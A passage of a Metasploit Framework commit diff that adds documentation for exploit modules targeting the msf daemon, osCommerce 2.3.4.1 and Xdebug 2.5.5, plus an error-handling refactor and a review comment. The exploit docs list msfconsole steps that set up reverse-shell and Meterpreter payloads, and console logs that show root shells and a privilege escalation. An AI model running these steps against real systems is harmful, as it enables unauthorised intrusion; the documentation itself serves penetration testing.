Merge branch 'master' into ms-2962
038fe03777
10
Gemfile.lock
10
Gemfile.lock
|
@ -18,9 +18,9 @@ PATH
|
|||
metasploit-concern
|
||||
metasploit-credential
|
||||
metasploit-model
|
||||
metasploit-payloads (= 1.3.33)
|
||||
metasploit-payloads (= 1.3.34)
|
||||
metasploit_data_models
|
||||
metasploit_payloads-mettle (= 0.3.7)
|
||||
metasploit_payloads-mettle (= 0.3.8)
|
||||
mqtt
|
||||
msgpack
|
||||
nessus_rest
|
||||
|
@ -121,7 +121,7 @@ GEM
|
|||
dnsruby (1.60.2)
|
||||
docile (1.3.0)
|
||||
erubis (2.7.0)
|
||||
eventmachine (1.2.5)
|
||||
eventmachine (1.2.6)
|
||||
factory_bot (4.8.2)
|
||||
activesupport (>= 3.0.0)
|
||||
factory_bot_rails (4.8.2)
|
||||
|
@ -161,7 +161,7 @@ GEM
|
|||
activemodel (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
railties (~> 4.2.6)
|
||||
metasploit-payloads (1.3.33)
|
||||
metasploit-payloads (1.3.34)
|
||||
metasploit_data_models (3.0.0)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
|
@ -172,7 +172,7 @@ GEM
|
|||
postgres_ext
|
||||
railties (~> 4.2.6)
|
||||
recog (~> 2.0)
|
||||
metasploit_payloads-mettle (0.3.7)
|
||||
metasploit_payloads-mettle (0.3.8)
|
||||
method_source (0.9.0)
|
||||
mini_portile2 (2.3.0)
|
||||
minitest (5.11.3)
|
||||
|
|
|
@ -0,0 +1,99 @@
|
|||
## Description
|
||||
|
||||
This module connects to the Metasploit msf daemon and uses the ruby interpreter
|
||||
to achieve a shell. This module can be used when the vulnerable service is only
|
||||
listening on localhost and the attacker has not achieved a foothold on the
|
||||
machine. To achieve code execution, the data is sent from the victim's browser.
|
||||
To achieve this, the victim must visit the attacker's web site.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
[Metasploit](https://github.com/rapid7/metasploit-framework) has a legacy method
|
||||
of providing remote access. The msf daemon provides no means of authentication
|
||||
and is therefore vulnerable against an attacker who has IP access to the daemon.
|
||||
In those cases where the daemon is listening on localhost, we take advantage of
|
||||
the fact that the victim's web browser has IP access to the daemon.
|
||||
|
||||
Because the msfconsole-program is line-based, it is possible to successfully
|
||||
send commands through the HTTP-protocol. This module takes advantage of this by
|
||||
placing the msfconsole-command in the POST-data of a HTTP-request. Since these
|
||||
POST-requests are considered safe to send cross-domain, it is possible to send
|
||||
them from the attacker's web application and to localhost using the victim's
|
||||
browser.
|
||||
|
||||
All versions of Metasploit are affected by this module, however testing has only
|
||||
been performed on the following targets:
|
||||
|
||||
* Metasploit 5.0.0 on Ubuntu 16.04 (using Firefox and Chrome)
|
||||
* Metasploit 4.16.51 on Windows 7 (using IE, exploitation failed in Firefox and
|
||||
Chrome)
|
||||
|
||||
***NB!*** Exploitation on Windows had a higher degree of success, when the
|
||||
quiet-flag was sent to the msf daemon. On Linux, it made no difference.
|
||||
|
||||
Source code and installers:
|
||||
|
||||
* [Source Code Repository](https://github.com/rapid7/metasploit-framework)
|
||||
* [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start the vulnerable service `msfd -q -f`
|
||||
2. Start `msfconsole`
|
||||
3. Do: `use exploit/multi/browser/msfd_rce_browser`
|
||||
4. Do: `set REMOTE_IP [IP]` (default: `127.0.0.1`)
|
||||
5. Do: `set RPORT [PORT]` (default: `55554`)
|
||||
6. Do: `set PAYLOAD [PAYLOAD]`
|
||||
7. Do: `exploit`
|
||||
8. Do: Visit the listed URL from the victim's machine
|
||||
9. You should get a shell
|
||||
|
||||
|
||||
## Options
|
||||
|
||||
Options unique for this module is described below.
|
||||
|
||||
**REMOTE_IP**
|
||||
|
||||
IP to target when running inside the victim's browser.
|
||||
|
||||
**REMOTE_PORT**
|
||||
|
||||
Remote port the vulnerable service is running at, default is 55554.
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Through the victim's browser
|
||||
|
||||
```
|
||||
msf5 > use exploit/multi/browser/msfd_rce_browser
|
||||
msf5 exploit(multi/browser/msfd_rce_browser) > set payload ruby/shell_reverse_tcp
|
||||
payload => ruby/shell_reverse_tcp
|
||||
msf5 exploit(multi/browser/msfd_rce_browser) > set lhost 192.168.0.17
|
||||
lhost => 192.168.0.17
|
||||
msf5 exploit(multi/browser/msfd_rce_browser) > set lport 443
|
||||
lport => 443
|
||||
msf5 exploit(multi/browser/msfd_rce_browser) > exploit
|
||||
[*] Exploit running as background job 0.
|
||||
|
||||
[-] Handler failed to bind to 192.168.0.17:443:- -
|
||||
[*] Started reverse TCP handler on 0.0.0.0:443
|
||||
msf5 exploit(multi/browser/msfd_rce_browser) > [*] Using URL:
|
||||
http://0.0.0.0:8080/J5ras6oYftFWW4
|
||||
[*] Local IP: http://172.17.0.2:8080/J5ras6oYftFWW4
|
||||
[*] Server started.
|
||||
```
|
||||
|
||||
Visit the web site listed in a browser on the victim's machine and you should
|
||||
get the output below.
|
||||
|
||||
```
|
||||
[*] 192.168.0.17 msfd_rce_browser - 192.168.0.17 msfd_rce_browser
|
||||
Sending HTML...
|
||||
[*] Command shell session 4 opened (172.17.0.2:443 -> 192.168.0.17:48376) at 2018-04-22 19:15:07 +0000
|
||||
id
|
||||
[*] exec: id
|
||||
|
||||
uid=0(root) gid=0(root) groups=0(root)
|
||||
```
|
|
@ -0,0 +1,38 @@
|
|||
## Vulnerable Application
|
||||
|
||||
osCommerce version 2.3.4.1 is vulnerable to remote code execution. If the `/install/` directory was not removed, it is possible for an unauthenticated attacker to run the `install_4.php` script, which will create the configuration file for the installation. This allows the attacker to inject PHP code into the configuration file and execute it.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Download and install [osCommerce 2.3.4.1](https://www.exploit-db.com/apps/ce2796b352d6e0fb4e9f03866ae98541-oscommerce-2.3.4.zip)
|
||||
2. `use exploit/multi/http/oscommerce_installer_unauth_code_exec`
|
||||
3. `set RHOST IP`
|
||||
4. `set PAYLOAD php/meterpreter/reverse_tcp`
|
||||
5. `set LHOST IP`
|
||||
6. `exploit`
|
||||
7. **Verify** a new Meterpreter session is started
|
||||
|
||||
## Scenarios
|
||||
|
||||
### osCommerce version 2.3.4.1 on Debian
|
||||
|
||||
```
|
||||
msf > use exploit/multi/http/oscommerce_installer_unauth_code_exec
|
||||
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set RHOST 172.16.40.188
|
||||
RHOST => 172.16.40.188
|
||||
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set PAYLOAD php/meterpreter/reverse_tcp
|
||||
PAYLOAD => php/meterpreter/reverse_tcp
|
||||
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set LHOST 172.16.40.5
|
||||
LHOST => 172.16.40.5
|
||||
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.40.5:4444
|
||||
[*] Sending stage (37543 bytes) to 172.16.40.188
|
||||
[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.188:47466) at 2018-04-05 18:14:45 +0100
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : oscommerce
|
||||
OS : Linux oscommerce 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u2 (2017-03-07) x86_64
|
||||
Meterpreter : php/linux
|
||||
meterpreter >
|
||||
```
|
|
@ -0,0 +1,106 @@
|
|||
## Description
|
||||
|
||||
This module connects to the Metasploit msf daemon and uses the ruby interpreter
|
||||
to achieve a shell. This module can target remote systems if the daemon is
|
||||
exposed on a remote interface or it can be used for privilege escalation when
|
||||
the attacker has a foothold. If used as privilege escalation, port forwarding
|
||||
must be set up.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
[Metasploit](https://github.com/rapid7/metasploit-framework) has a legacy method
|
||||
of providing remote access. The msf daemon provides no means of authentication
|
||||
and is therefore vulnerable against an attacker who has IP access to the daemon.
|
||||
|
||||
All versions of Metasploit are affected by this module, however testing has only
|
||||
been performed on the following targets:
|
||||
|
||||
* Metasploit 5.0.0 on Ubuntu 16.04
|
||||
* Metasploit 4.16.51 on Windows 7
|
||||
|
||||
Source code and installers:
|
||||
|
||||
* [Source Code Repository](https://github.com/rapid7/metasploit-framework)
|
||||
* [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start the vulnerable service: `msfd -f -q -a 0.0.0.0`
|
||||
2. Start `msfconsole`
|
||||
3. Do: `use exploit/multi/misc/msfd_rce_remote`
|
||||
4. Do: `set RHOST [IP]`
|
||||
5. Do: `set RPORT [PORT]` (default: `55554`)
|
||||
6. Do: `set PAYLOAD [PAYLOAD]`
|
||||
7. Do: `exploit`
|
||||
8. You should get a shell
|
||||
|
||||
|
||||
## Options
|
||||
|
||||
**RHOST**
|
||||
|
||||
Remote Host
|
||||
|
||||
**RPORT**
|
||||
|
||||
Remote port the vulnerable service is running at, default is 55554.
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Remote target
|
||||
|
||||
```
|
||||
msf5 > use exploit/multi/misc/msfd_rce_remote
|
||||
msf5 exploit(multi/misc/msfd_rce_remote) > set rhost 192.168.56.101
|
||||
rhost => 192.168.56.101
|
||||
msf5 exploit(multi/misc/msfd_rce_remote) > set payload ruby/shell_reverse_tcp
|
||||
payload => ruby/shell_reverse_tcp
|
||||
msf5 exploit(multi/misc/msfd_rce_remote) > set lhost 192.168.0.17
|
||||
lhost => 192.168.0.17
|
||||
msf5 exploit(multi/misc/msfd_rce_remote) > set lport 443
|
||||
lport => 443
|
||||
msf5 exploit(multi/misc/msfd_rce_remote) > exploit
|
||||
|
||||
[-] Handler failed to bind to 192.168.0.17:443:- -
|
||||
[*] Started reverse TCP handler on 0.0.0.0:443
|
||||
[*] Command shell session 1 opened (172.17.0.2:443 -> 192.168.0.17:48152) at 2018-04-22 18:43:41 +0000
|
||||
|
||||
whoami
|
||||
robin
|
||||
```
|
||||
|
||||
|
||||
### Local target - privilege escalation
|
||||
|
||||
```
|
||||
meterpreter > getuid
|
||||
Server username: uid=1000, gid=1000, euid=1000, egid=1000
|
||||
meterpreter > shell
|
||||
Process 17366 created.
|
||||
Channel 1 created.
|
||||
netstat -lntup|grep 55554
|
||||
(Not all processes could be identified, non-owned process info
|
||||
will not be shown, you would have to be root to see it all.)
|
||||
tcp 0 0 127.0.0.1:55554 0.0.0.0:* LISTEN -
|
||||
ps aux | grep msfd
|
||||
root 17303 3.3 13.8 535168 283492 pts/18 Sl+ 20:47 0:08 ruby ./msfd -f -q
|
||||
^C
|
||||
Terminate channel 1? [y/N] y
|
||||
meterpreter > portfwd add -l 55554 -p 55554 -r 127.0.0.1
|
||||
[*] Local TCP relay created: :55554 <-> 127.0.0.1:55554
|
||||
meterpreter > background
|
||||
[*] Backgrounding session 2...
|
||||
msf5 > use exploit/multi/misc/msfd_rce_remote
|
||||
msf5 exploit(multi/misc/msfd_rce_remote) > set rhost 127.0.0.1
|
||||
rhost => 127.0.0.1
|
||||
msf5 exploit(multi/misc/msfd_rce_remote) > exploit
|
||||
|
||||
[-] Handler failed to bind to 192.168.0.17:443:- -
|
||||
[*] Started reverse TCP handler on 0.0.0.0:443
|
||||
[*] Command shell session 3 opened (172.17.0.2:443 -> 192.168.0.17:48300) at 2018-04-22 18:55:19 +0000
|
||||
|
||||
id
|
||||
uid=0(root) gid=0(root) groups=0(root)
|
||||
```
|
||||
|
|
@ -0,0 +1,127 @@
|
|||
## Vulnerable Application
|
||||
|
||||
[Xdebug](https://xdebug.org/docs-dbgp.php) is an actively-maintained PHP debugging tool that supports remote debugging of server-side PHP code
|
||||
|
||||
This module exploits an unauthenticated vulnerability that allows for the upload of a PHP file and subsequent execution to provide a Meterpreter session back. The module was tested on XDebug version 2.5.5
|
||||
|
||||
The vulnerability was discovered by [Ricter Zheng](https://ricterz.me/posts/Xdebug%3A%20A%20Tiny%20Attack%20Surface) (WARNING: This link is in Chinese. [Google Translate version](https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https%3A%2F%2Fricterz.me%2Fposts%2FXdebug%3A%20A%20Tiny%20Attack%20Surface))
|
||||
|
||||
|
||||
### Setting up XDebug 2.5.5 on xUbuntu 16.04 x64 Desktop
|
||||
|
||||
Start with a LAMP server:
|
||||
|
||||
```
|
||||
sudo apt update && sudo apt install -y tasksel
|
||||
sudo tasksel install lamp-server
|
||||
```
|
||||
|
||||
Now grab XDebug, specifically the version cited by @MinatoTW:
|
||||
```
|
||||
wget https://xdebug.org/files/xdebug-2.5.5.tgz
|
||||
tar xvzf xdebug-2.5.5.tgz
|
||||
cd xdebug-2.5.5/
|
||||
php -i
|
||||
```
|
||||
|
||||
Paste the contents of your `php -i` output into [the XDebug installation wizard](https://xdebug.org/wizard.php), which gave me the following:
|
||||
|
||||
```
|
||||
sudo apt install -y php7.0-dev
|
||||
phpize && ./configure && make
|
||||
sudo cp modules/xdebug.so /usr/lib/php/20151012/
|
||||
```
|
||||
|
||||
The final step of the wizard is to configure `php.ini`:
|
||||
|
||||
```
|
||||
sudo -s
|
||||
cat >> /etc/php/7.0/cli/php.ini <<EOL
|
||||
zend_extension = /usr/lib/php/20151012/xdebug.so
|
||||
xdebug.remote_enable = 1
|
||||
xdebug.remote_handler = dbgp
|
||||
xdebug.remote_autostart = 0
|
||||
xdebug.remote_connect_back = 1
|
||||
xdebug.remote_port = 9000
|
||||
xdebug.remote_host = 127.0.0.1
|
||||
xdebug.profiler_enable=0
|
||||
xdebug.profiler_enable_trigger=1
|
||||
xdebug.profiler_output_dir="/tmp"`
|
||||
EOL
|
||||
exit
|
||||
```
|
||||
|
||||
Now that the PHP CLI environment is configured, repeat the above steps for the Apache2 configuration:
|
||||
|
||||
```
|
||||
sudo -s
|
||||
cat >> /etc/php/7.0/cli/php.ini <<EOL
|
||||
zend_extension = /usr/lib/php/20151012/xdebug.so
|
||||
xdebug.remote_enable = 1
|
||||
xdebug.remote_handler = dbgp
|
||||
xdebug.remote_autostart = 0
|
||||
xdebug.remote_connect_back = 1
|
||||
xdebug.remote_port = 9000
|
||||
xdebug.remote_host = 127.0.0.1
|
||||
xdebug.profiler_enable=0
|
||||
xdebug.profiler_enable_trigger=1
|
||||
xdebug.profiler_output_dir="/tmp"`
|
||||
EOL
|
||||
exit
|
||||
```
|
||||
|
||||
And restart Apache2 for good measure:
|
||||
```
|
||||
sudo service apache2 restart
|
||||
```
|
||||
|
||||
And now test that XDebug is working:
|
||||
```
|
||||
php -r 'echo xdebug_time_index();'; echo
|
||||
```
|
||||
|
||||
You should see a fairly small number, in my case `4.6014785766602E-5`, which indicates the number of seconds since the php script started, thus the incredibly small number.
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
- Start `msfconsole`
|
||||
- `use exploits/unix/http/xdebug_rce`
|
||||
- `check`
|
||||
- `set RHOST 192.168.69.2`
|
||||
- `set LHOST 192.168.69.1`
|
||||
- `set VERBOSE true` (optional)
|
||||
- `exploit`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### XDebug 2.5.5 on Ubuntu 16.04 with Apache2 2.4.18
|
||||
|
||||
msf5 exploit(unix/http/xdebug_unauth_exec) > check
|
||||
|
||||
[*] 192.168.69.2:80 - Request sent
|
||||
Date: Fri, 27 Apr 2018 21:00:37 GMT
|
||||
Server: Apache/2.4.18 (Ubuntu)
|
||||
Set-Cookie: XDEBUG_SESSION=WIO6hf4Wez; expires=Fri, 27-Apr-2018 22:00:37 GMT; Max-Age=3600; path=/
|
||||
Content-Length: 16
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
|
||||
[+] 192.168.69.2:80 - Looks like remote server has xdebug enabled
|
||||
|
||||
[*] 192.168.69.2:80 The target service is running, but could not be validated.
|
||||
|
||||
|
||||
msf5 exploit(unix/http/xdebug_unauth_exec) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.69.1:4444
|
||||
[*] 192.168.69.2:80 - Waiting for client response.
|
||||
[*] 192.168.69.2:80 - Receiving response
|
||||
508<?xml version="1.0" encoding="iso-8859-1"?>
|
||||
<init xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" fileuri="file:///var/www/html/index.php" language="PHP" xdebug:language_version="7.0.28-0ubuntu0.16.04.1" protocol_version="1.0" appid="28166" idekey="5Gg6S9au8B"><engine version="2.5.5"><![CDATA[Xdebug]]></engine><author><![CDATA[Derick Rethans]]></author><url><![CDATA[http://xdebug.org]]></url><copyright><![CDATA[Copyright (c) 2002-2017 by Derick Rethans]]></copyright></init>
|
||||
[*] 192.168.69.2:80 - Shell might take upto a minute to respond.Please be patient.
|
||||
[*] 192.168.69.2:80 - Sending payload of size 2098 bytes
|
||||
[*] Sending stage (37775 bytes) to 192.168.69.2
|
||||
[*] Meterpreter session 1 opened (192.168.69.1:4444 -> 192.168.69.2:55506) at 2018-04-27 15:57:58 -0500
|
||||
[+] 192.168.69.2:80 - Deleted /tmp/OLEaK
|
||||
|
|
@ -4,7 +4,7 @@ module CredentialDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.create_credential(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem creating credential")
|
||||
end
|
||||
end
|
||||
|
@ -14,7 +14,7 @@ module CredentialDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.creds(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem retrieving credentials")
|
||||
end
|
||||
end
|
||||
|
|
|
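Review bot: After the narrowing to `rescue => e` in both hunks, `create_credential` and `creds` still return whatever `self.log_error` returns on failure — presumably nil — so a caller that iterates the result of `creds` hits a NoMethodError far away from the logged cause. Moving from `Exception` to StandardError is the right call (it stops swallowing Interrupt, SystemExit and NoMemoryError), but the log-and-continue shape still wants either a re-raise after logging or a documented fallback; at minimum add `# Logs and returns nil when the data service raises` above each method. The same shape appears in the DbExportDataProxy, EventDataProxy, ExploitDataProxy, HostDataProxy, LootDataProxy, NmapDataProxy, NoteDataProxy, ServiceDataProxy, SessionDataProxy, SessionEventDataProxy, VulnAttemptDataProxy, VulnDataProxy, WebDataProxy and WorkspaceDataProxy sections of this commit. Both method headers lie outside the hunks.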
@ -8,7 +8,7 @@ module DbExportDataProxy
|
|||
}
|
||||
add_opts_workspace(opts)
|
||||
data_service.run_db_export(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem generating DB Export")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -5,7 +5,7 @@ module EventDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.report_event(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem reporting event")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -4,7 +4,7 @@ module ExploitDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.report_exploit_attempt(host, opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem reporting exploit attempt")
|
||||
end
|
||||
end
|
||||
|
@ -14,7 +14,7 @@ module ExploitDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.report_exploit_failure(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem reporting exploit failure")
|
||||
end
|
||||
end
|
||||
|
@ -24,7 +24,7 @@ module ExploitDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.report_exploit_success(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem reporting exploit success")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -9,7 +9,7 @@ module HostDataProxy
|
|||
opts[:address] = addresses
|
||||
opts[:search_term] = search_term
|
||||
data_service.hosts(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem retrieving hosts")
|
||||
end
|
||||
end
|
||||
|
@ -37,7 +37,7 @@ module HostDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.report_host(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem reporting host")
|
||||
end
|
||||
end
|
||||
|
@ -47,7 +47,7 @@ module HostDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(hosts)
|
||||
data_service.report_hosts(hosts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem reporting hosts")
|
||||
end
|
||||
end
|
||||
|
@ -56,7 +56,7 @@ module HostDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.update_host(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem updating host")
|
||||
end
|
||||
end
|
||||
|
@ -65,7 +65,7 @@ module HostDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.delete_host(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem deleting host")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -8,7 +8,7 @@ module LootDataProxy
|
|||
end
|
||||
add_opts_workspace(opts)
|
||||
data_service.report_loot(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem reporting loot")
|
||||
end
|
||||
end
|
||||
|
@ -24,7 +24,7 @@ module LootDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts, wspace)
|
||||
data_service.loot(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem retrieving loot")
|
||||
end
|
||||
end
|
||||
|
@ -35,7 +35,7 @@ module LootDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.update_loot(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem updating loot")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -5,7 +5,7 @@ module NmapDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(args)
|
||||
data_service.import_nmap_xml_file(args)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem importing Nmap XML file")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -5,7 +5,7 @@ module NoteDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.notes(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem retrieving notes")
|
||||
end
|
||||
end
|
||||
|
@ -20,7 +20,7 @@ module NoteDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.report_note(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem reporting note")
|
||||
end
|
||||
end
|
||||
|
@ -29,7 +29,7 @@ module NoteDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.update_note(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem updating note")
|
||||
end
|
||||
end
|
||||
|
@ -38,7 +38,7 @@ module NoteDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.delete_note(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem deleting note")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -5,7 +5,7 @@ module ServiceDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts, wspace)
|
||||
data_service.services(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, 'Problem retrieving services')
|
||||
end
|
||||
end
|
||||
|
@ -19,7 +19,7 @@ module ServiceDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.report_service(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, 'Problem reporting service')
|
||||
end
|
||||
end
|
||||
|
@ -28,7 +28,7 @@ module ServiceDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.update_service(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, 'Problem updating service')
|
||||
end
|
||||
end
|
||||
|
@ -37,7 +37,7 @@ module ServiceDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.delete_service(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, 'Problem deleting service')
|
||||
end
|
||||
end
|
||||
|
|
|
@ -3,7 +3,7 @@ module SessionDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.report_session(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem reporting session")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -4,7 +4,7 @@ module SessionEventDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service.report_session_event(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem reporting session event")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -4,7 +4,7 @@ module VulnAttemptDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.vuln_attempts(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem retrieving vulnerability attempts")
|
||||
end
|
||||
end
|
||||
|
@ -14,7 +14,7 @@ module VulnAttemptDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.report_vuln_attempt(vuln, opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem reporting vulnerability attempts")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -6,7 +6,7 @@ module VulnDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.vulns(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem retrieving vulns")
|
||||
end
|
||||
end
|
||||
|
@ -16,7 +16,7 @@ module VulnDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.report_vuln(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem reporting vuln")
|
||||
end
|
||||
end
|
||||
|
@ -25,7 +25,7 @@ module VulnDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.update_vuln(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem updating vuln")
|
||||
end
|
||||
end
|
||||
|
@ -34,7 +34,7 @@ module VulnDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.delete_vuln(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem deleting vuln")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -3,7 +3,7 @@ module WebDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service.report_web_site(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem reporting website")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -5,7 +5,7 @@ module WorkspaceDataProxy
|
|||
data_service = self.get_data_service
|
||||
opts = { name: workspace_name }
|
||||
data_service.workspaces(opts).first
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem finding workspace")
|
||||
end
|
||||
end
|
||||
|
@ -15,7 +15,7 @@ module WorkspaceDataProxy
|
|||
data_service = self.get_data_service
|
||||
opts = { name: workspace_name }
|
||||
data_service.add_workspace(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem adding workspace")
|
||||
end
|
||||
end
|
||||
|
@ -27,7 +27,7 @@ module WorkspaceDataProxy
|
|||
ws = add_workspace(Msf::DBManager::Workspace::DEFAULT_WORKSPACE_NAME)
|
||||
end
|
||||
ws
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem finding default workspace")
|
||||
end
|
||||
end
|
||||
|
@ -42,7 +42,7 @@ module WorkspaceDataProxy
|
|||
warn "@current_workspace was not set. Setting to default_workspace: #{default_workspace.name}"
|
||||
@current_workspace = default_workspace
|
||||
end
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem retrieving workspace")
|
||||
end
|
||||
end
|
||||
|
@ -51,7 +51,7 @@ module WorkspaceDataProxy
|
|||
def workspace=(workspace)
|
||||
begin
|
||||
@current_workspace = workspace
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem setting workspace")
|
||||
end
|
||||
end
|
||||
|
@ -60,7 +60,7 @@ module WorkspaceDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.workspaces(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem retrieving workspaces")
|
||||
end
|
||||
end
|
||||
|
@ -69,7 +69,7 @@ module WorkspaceDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.delete_workspaces(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem deleting workspaces")
|
||||
end
|
||||
end
|
||||
|
@ -78,7 +78,7 @@ module WorkspaceDataProxy
|
|||
begin
|
||||
